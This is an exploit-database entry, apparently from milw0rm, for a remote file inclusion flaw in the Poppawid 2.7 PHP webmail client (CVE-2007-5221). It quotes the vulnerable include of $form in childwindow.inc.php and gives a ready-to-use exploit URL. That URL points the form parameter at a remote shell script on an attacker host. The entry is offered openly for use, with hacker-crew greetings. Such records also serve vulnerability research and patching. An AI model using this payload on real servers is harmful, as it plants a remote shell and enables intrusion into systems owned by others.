Poppawid 2.7 - 'form' Remote File Inclusion

Author: 0in
type: webapps
platform: php
port: 
date_added: 2007-10-01  
date_updated: 2016-10-12  
verified: 1  
codes: OSVDB-37422;CVE-2007-5221  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.compoppawid.2.7.tar.gz  

raw file: 4481.txt  

#Poppawid Remote File include
#f0und bY 0in
#Greetings to: All Dark-Coders Team Members
#IRC: #dark-coders at warszawa.irc.pl
#About:popper_mod-wid is a free (and popular), full featured web based email client
#Download:http://poppawid.sourceforge.net/
#No dork for script kiddies..;]
#Register_globals=On
#BUG:
poppawid/mail/childwindow.inc.php:33:                                   <?php include($form.".form.inc.php");?>
Expl0it:
http://x.com/[path]/mail/childwindow.inc.php?form=http://h4x0r.org/shell.txt?

# milw0rm.com [2007-10-02]